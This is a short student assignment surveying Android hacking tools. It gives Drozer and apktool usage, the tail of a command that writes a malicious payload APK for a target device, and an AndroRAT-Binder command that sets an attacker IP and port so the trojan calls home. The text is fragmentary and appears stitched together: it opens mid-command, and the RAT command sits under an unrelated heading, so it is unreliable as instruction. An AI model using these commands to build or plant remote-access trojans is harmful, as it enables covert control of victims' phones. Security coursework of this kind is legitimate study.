Assignment 4 Nielit
Assignment 4 Nielit
Submitted By
Shubham Raj Satyam
R > /path/to/your/payload.apk: The output file where the APK will be saved.
Note: The target device must have the "Install from Unknown Sources"
option enabled.
2. Drozer
Drozer is a comprehensive security auditing tool for Android
applications. It allows security testers to interact with Android apps and
the operating system, identifying and exploiting security vulnerabilities.
Features:
Test app permissions and components.
Exploit known vulnerabilities in apps.
Inspect and interact with Android IPC endpoints.
Execute dynamic security assessments.
Usage:
drozer console connect
You can then use various Drozer commands to inspect and test Android
applications.
3. apktool
Apktool is a tool for reverse engineering Android APK files. It allows
you to decompile and recompile APKs, making it useful for analyzing
and modifying Android applications.
Features:
Decompile APK files to access source code and resources.
Recompile modified APK files.
Automate repetitive tasks with scripting.
Usage:
Decompile an APK:
apktool d /path/to/app.apk
Recompile the APK:
apktool b /path/to/decompiled/folder
Example command:
java -jar AndroRAT-Binder.jar -ip [Your_IP_Address] -port 8888
Replace [Your_IP_Address] with the IP address of your machine.